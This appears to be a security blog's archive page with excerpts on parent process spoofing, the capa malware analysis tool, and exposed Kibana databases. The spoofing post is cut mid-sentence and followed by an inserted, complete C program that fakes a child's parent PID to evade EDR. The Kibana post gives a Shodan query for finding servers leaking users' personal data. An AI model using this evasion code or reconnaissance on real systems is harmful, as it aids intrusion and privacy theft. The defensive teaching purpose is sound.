Posts

Showing posts from August, 2020

Parent process spoofing and how to detect them

Malware uses various techniques to hide itself from, or evade, antivirus and EDR systems. So I decided to discuss a very interesting malware hiding technique: parent process spoofing. This technique is well discussed by many other infosec people, and Didier Stevens blogged about it in 2009. I decided to discuss it in layman's terms.

Parent process spoofing lets a malicious program choose which process appears as the parent of the process it spawns. It helps the malicious program hide from parent-child process relationship analysis, which defenders use to find anomalies (an Office application spawning a command shell, for example).

How does it work

This is an abuse of a Windows feature. It uses the Windows API function CreateProcessA, which creates a new process. This function has a parameter lpStartupInfo which, when the EXTENDED_STARTUPINFO_PRESENT flag is passed in dwCreationFlags, points to a STARTUPINFOEX structure. The STARTUPINFOEX structure contains lpAttributeList, and it is this attribute list (via the PROC_THREAD_ATTRIBUTE_PARENT_PROCESS attribute) that lets you choose the parent process. lpAttributeList is created by the InitializeProcThreadAttributeList function; this function will allocate the m
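The steps above end in a short Win32 program. The following is an added example written for this page; it is not code from the post and not Didier Stevens' SelectMyParent. The function names (parse_pid, spawn_with_parent), the usage line and the 1024-byte command-line buffer are this example's own choices. It needs the Win32 API, so the spawning code is only compiled on Windows (MinGW or MSVC); on other systems the file still builds but only the PID parsing remains. Run it as an ordinary user against a parent PID you own (another process of yours), then look at the new child in Process Explorer or Process Hacker: its parent is the PID you passed, not this program.

```c
/*
 * Parent-PID spoofing with CreateProcessA and PROC_THREAD_ATTRIBUTE_PARENT_PROCESS.
 * Added example for this page (not the post's or Didier Stevens' code).
 *
 *   Usage (Windows):  ppid_spoof.exe <parent-pid> "<command line>"
 *   e.g.              ppid_spoof.exe 1234 "C:\Windows\System32\notepad.exe"
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Parse a decimal PID from the command line; returns 0 on bad input. */
unsigned long parse_pid(const char *s)
{
    char *end = NULL;
    unsigned long pid;
    if (s == NULL || *s == '\0')
        return 0;
    pid = strtoul(s, &end, 10);
    return (*end == '\0') ? pid : 0;
}

#ifdef _WIN32
#define _WIN32_WINNT 0x0600   /* STARTUPINFOEX and the attribute-list APIs need Vista+ */
#include <windows.h>

/*
 * Start `cmdline` so that the process with PID `parent_pid` appears as its parent.
 * Returns the new child's PID, or 0 on failure.
 */
DWORD spawn_with_parent(DWORD parent_pid, const char *cmdline)
{
    DWORD child_pid = 0;
    SIZE_T attr_size = 0;
    LPPROC_THREAD_ATTRIBUTE_LIST attrs = NULL;
    STARTUPINFOEXA si;
    PROCESS_INFORMATION pi;
    char cmd[1024];                      /* buffer size is an arbitrary choice */

    /* Step 1: a handle to the chosen parent; PROCESS_CREATE_PROCESS is the right needed. */
    HANDLE hParent = OpenProcess(PROCESS_CREATE_PROCESS, FALSE, parent_pid);
    if (hParent == NULL)
        return 0;

    /* Step 2: InitializeProcThreadAttributeList is called twice: first with a NULL
       list to learn the required size, then on the allocated buffer. */
    InitializeProcThreadAttributeList(NULL, 1, 0, &attr_size);
    attrs = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, attr_size);
    if (attrs == NULL)
        goto cleanup;
    if (!InitializeProcThreadAttributeList(attrs, 1, 0, &attr_size)) {
        HeapFree(GetProcessHeap(), 0, attrs);   /* never initialised, so no Delete call */
        attrs = NULL;
        goto cleanup;
    }

    /* Step 3: the attribute that makes hParent the parent of the new process. */
    if (!UpdateProcThreadAttribute(attrs, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS,
                                   &hParent, sizeof(hParent), NULL, NULL))
        goto cleanup;

    /* Step 4: STARTUPINFOEX carries the list; EXTENDED_STARTUPINFO_PRESENT tells
       CreateProcessA to treat lpStartupInfo as the extended structure. */
    ZeroMemory(&si, sizeof(si));
    si.StartupInfo.cb = sizeof(si);
    si.lpAttributeList = attrs;
    ZeroMemory(&pi, sizeof(pi));

    /* lpCommandLine must be a writable buffer, so copy the caller's string. */
    strncpy(cmd, cmdline, sizeof(cmd) - 1);
    cmd[sizeof(cmd) - 1] = '\0';

    if (CreateProcessA(NULL, cmd, NULL, NULL, FALSE, EXTENDED_STARTUPINFO_PRESENT,
                       NULL, NULL, &si.StartupInfo, &pi)) {
        child_pid = pi.dwProcessId;
        CloseHandle(pi.hThread);
        CloseHandle(pi.hProcess);
    }

cleanup:
    if (attrs != NULL) {
        DeleteProcThreadAttributeList(attrs);
        HeapFree(GetProcessHeap(), 0, attrs);
    }
    CloseHandle(hParent);
    return child_pid;
}
#endif /* _WIN32 */

int main(int argc, char **argv)
{
    unsigned long pid;
    if (argc != 3) {
        fprintf(stderr, "usage: %s <parent-pid> \"<command line>\"\n", argv[0]);
        return 2;
    }
    pid = parse_pid(argv[1]);
    if (pid == 0) {
        fprintf(stderr, "bad pid: %s\n", argv[1]);
        return 2;
    }
#ifdef _WIN32
    {
        DWORD child = spawn_with_parent((DWORD)pid, argv[2]);
        if (child == 0) {
            fputs("spawn failed (no handle to that PID, or CreateProcess error)\n", stderr);
            return 1;
        }
        printf("child PID %lu now shows PID %lu as its parent\n", child, pid);
    }
#else
    fputs("parent-PID spoofing needs the Win32 API; build and run this on Windows\n", stderr);
    return 1;
#endif
    return 0;
}
```

The detail defenders care about is in step 1: before the spoofed child appears, the program has to open a handle to the chosen parent with PROCESS_CREATE_PROCESS access, and that handle request is visible to tooling that logs process handle access.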

Testing capa the Malware analysis tool

Recently FireEye released the open-source malware analysis tool capa. It became very popular among malware analysts because of its ability to tell the capabilities of malware, that is, what a portable executable file can do when executed on a Windows machine. I decided to test it on some custom malware samples to see how it works. I chose one malware sample from theZoo, a repository of live malware. I selected the binary file Trojan.Dropper.GEN. On checking VirusTotal, this one has a detection rate of 43/63. I did some basic behavior analysis on any.run, and here is its summary. On checking the process graph it's clear this binary file drops and executes multiple malicious files, so I started analysis of ailiao.exe with capa. On executing, capa gives results about this binary file's capabilities and also shows which ATT&CK tactics and techniques the threat actor has used. We can see capa has reported that it matches 11 malicious activities which include connecting

How hundreds of websites are exposing their sensitive data and risking their user's privacy

The purpose of this article is to show how some websites are exposing their sensitive data and risking their users' privacy. Recently some reports came out on how some websites are exposing their Kibana instances due to misconfigured Elasticsearch databases, so I decided to dig deeper to see how bad it can get. In this post I will show you how easily a black hat could have compromised a site, its database and its users' personal information.

To do this one can go to shodan.io and enter kibana port:5601 country:"US" org:"Amazon.com" in the search query. Above, 5601 is the port Kibana is normally accessed on, US is the country code for the country you want to search, and org:"Amazon.com" is the hosting organization you want to search within; it could just as well be Azure, Google Cloud, DigitalOcean, etc.

On searching the above query I got 2.6k results. I checked a random server. Below we can see a user's logs (name hidden). One can also see other details like name and address. I will